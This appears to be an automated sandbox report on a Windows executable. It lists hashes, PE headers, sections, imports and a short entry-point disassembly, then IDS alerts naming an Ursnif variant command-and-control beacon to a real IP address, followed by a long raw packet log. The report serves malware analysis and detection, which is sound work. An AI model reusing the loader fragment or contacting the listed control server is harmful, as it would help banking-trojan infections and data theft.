MD5: 9676298f24c8cdd4b532ac027a00f60e
SHA1: 8d0bd57712533f1a889627706925c17ed4347ce5
SHA256: 0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
SHA512: 525b70896530a60cf58de64e8052ef2a8eb5ccc73d86fcd1f55d4850e682e3ff44c7ebc18ab029fc479b75a9a0083765c314c542b356d7ef8a7e7e493f13e7fd
SSDEEP: 768:/QLm41fM01vAqyRrlpItKFyr8MS1g7/s1w70anLq:/L41fMSvXArbYVrO0/saLq
TLSH: 9503E1967C6D152DDFDF82B22B2F618087392331565A50B4737F242F9A43D1B407B263
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......
Icon Hash: 00828e8e8686b000
Entrypoint: 0x40182f
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 1640d668d1471f340cbe565fe63522f6
                          Instruction
                          push esi
                          xor esi, esi
                          push esi
                          push 00400000h
                          push esi
                          call dword ptr [0040203Ch]
                          mov dword ptr [00403160h], eax
                          cmp eax, esi
                          je 00007F42ECE959C7h
                          push esi
                          call dword ptr [00402008h]
                          mov dword ptr [00403170h], eax
                          call dword ptr [00402044h]
                          call 00007F42ECE955D9h
                          push dword ptr [00403160h]
                          mov esi, eax
                          call dword ptr [00402040h]
                          push esi
                          call dword ptr [00402048h]
                          pop esi
                          push ebp
                          mov ebp, esp
                          sub esp, 0Ch
                          push ebx
                          push esi
                          mov esi, eax
                          mov eax, dword ptr [00403180h]
                          mov ecx, dword ptr [esi+3Ch]
                          mov ecx, dword ptr [ecx+esi+50h]
                          lea edx, dword ptr [eax-69B24F45h]
                          not edx
                          lea ecx, dword ptr [ecx+eax-69B24F45h]
                          push edi
                          and ecx, edx
                          lea edx, dword ptr [ebp-08h]
                          push edx
                          lea edx, dword ptr [ebp-04h]
                          push edx
                          add eax, 964DA0FCh
                          push eax
                          push ecx
                          call 00007F42ECE95C2Dh
                          test eax, eax
                          jne 00007F42ECE959FCh
                          mov edi, dword ptr [ebp-04h]
                          push esi
                          push edi
                          call 00007F42ECE95D03h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959D8h
                          mov esi, dword ptr [edi+3Ch]
                          add esi, edi
                          push esi
                          call 00007F42ECE95424h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959C7h
                          push edi
                          mov eax, esi
                          call 00007F42ECE95F04h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959B9h
                          mov esi, dword ptr [esi+28h]
                          push eax
                          push 00000001h
                          add esi, edi
                          push edi
                          call esi
                          test eax, eax
                          jne 00007F42ECE959AAh
                          call dword ptr [0000202Ch]
                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x20e8           0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5000           0x10          .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6000           0xd8          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0xa8          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x1000           0x1000        0x1000    False     0.718017578125      data       6.515539058364033    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x2000           0x4c0         0x600     False     0.4635416666666667  data       4.488955985688776    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3000           0x194         0x200     False     0.056640625         data       0.12227588125913882  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss    0x4000           0x2dc         0x400     False     0.7607421875        data       6.3016514258390215   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x5000           0x10          0x200     False     0.02734375          data       0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x6000           0x8000        0x7200    False     0.9698807565789473  data       7.856350754061323    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
DLL           Import
ntdll.dll     _snwprintf, memset, NtQuerySystemInformation, _aulldiv
KERNEL32.dll  GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
ADVAPI32.dll  ConvertStringSecurityDescriptorToSecurityDescriptorA
Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP    Dest IP
11/16/22-02:14:48.026105  TCP       2033203  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)  49698        80         192.168.2.3  134.0.118.203
11/16/22-02:14:48.026105  TCP       2033204  ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)  49698        80         192.168.2.3  134.0.118.203
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                          Nov 16, 2022 02:14:47.741097927 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.741133928 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.741137028 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.741161108 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.741177082 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.741182089 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.741216898 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.741235018 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.741255045 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.741257906 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.741295099 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.741302967 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.741342068 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802242994 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802288055 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802314997 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802340031 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802340031 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802366018 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802366972 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802391052 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802417040 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802417040 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802443027 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802443981 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802468061 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802468061 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802491903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802493095 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802516937 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802520037 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802532911 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802546024 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802572012 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802572012 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802596092 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802603006 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802620888 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802624941 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802647114 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802650928 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802670002 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802674055 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802696943 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802700996 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802723885 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802727938 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802737951 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802752972 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802778006 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802778959 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802787066 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802803040 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802824974 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802828074 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802839041 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802853107 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802876949 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802886009 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802892923 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802925110 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802934885 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802949905 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802963018 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.802977085 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.802990913 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803002119 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803026915 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803035975 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803052902 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803076982 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803078890 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803103924 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803111076 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803128958 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803133011 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803155899 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803178072 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803181887 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803193092 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803206921 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803229094 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803231001 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803256035 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803261042 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803282022 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.803283930 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803304911 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.803324938 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864157915 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864226103 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864268064 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864299059 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864299059 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864308119 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864346981 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864356041 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864356995 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864386082 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864403963 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864428043 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864444971 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864468098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864489079 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864507914 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864542007 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864547014 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864567995 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864586115 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864618063 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864643097 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864644051 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864686966 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864712954 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864761114 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864804029 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864821911 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864824057 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864877939 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864877939 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864933014 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.864933014 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864986897 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.864989996 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865036964 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865040064 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865092039 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865096092 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865149975 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865151882 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865204096 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865204096 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865256071 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865257978 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865308046 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865312099 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865364075 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865365982 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865418911 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865418911 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865469933 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865473032 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865524054 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865526915 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865576982 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865581989 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865633965 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865637064 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865688086 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865690947 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865744114 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865746021 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865798950 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865801096 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865853071 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865854979 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865904093 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865910053 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.865958929 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.865962982 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866014957 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866017103 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866072893 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866075993 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866126060 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866127014 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866178036 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866182089 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866234064 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866235971 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866290092 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866302013 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866343021 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866345882 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866406918 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866416931 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866461039 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866461992 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866513968 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866514921 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866568089 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866569996 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866624117 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866626024 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866676092 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866679907 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866729021 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866733074 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866782904 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866787910 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866838932 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866842985 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866897106 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.866921902 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.866978884 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867579937 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867644072 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867664099 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867698908 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867700100 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867750883 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867754936 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867805958 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867810011 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867862940 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867863894 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867914915 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867918015 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.867968082 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.867973089 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868022919 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868026018 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868079901 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868082047 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868134975 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868139029 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868191957 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868191957 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868243933 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868247032 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868299961 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868302107 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868354082 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868356943 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868406057 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868411064 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868463993 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868464947 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868515968 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868520975 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868571043 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868575096 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868626118 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868632078 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868700027 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868753910 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868753910 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868762016 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868813038 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868815899 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868868113 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868870974 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868922949 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.868925095 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868978977 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.868979931 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.869031906 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.869033098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.869079113 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930053949 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930093050 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930119038 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930143118 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930167913 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930186987 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930186987 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930196047 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930216074 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930234909 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930239916 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930253029 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930265903 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930283070 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930284977 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930306911 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930310011 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930334091 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930334091 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930355072 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930360079 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930372000 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:47.930385113 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:47.930408955 CET8049698134.0.118.203192.168.2.3
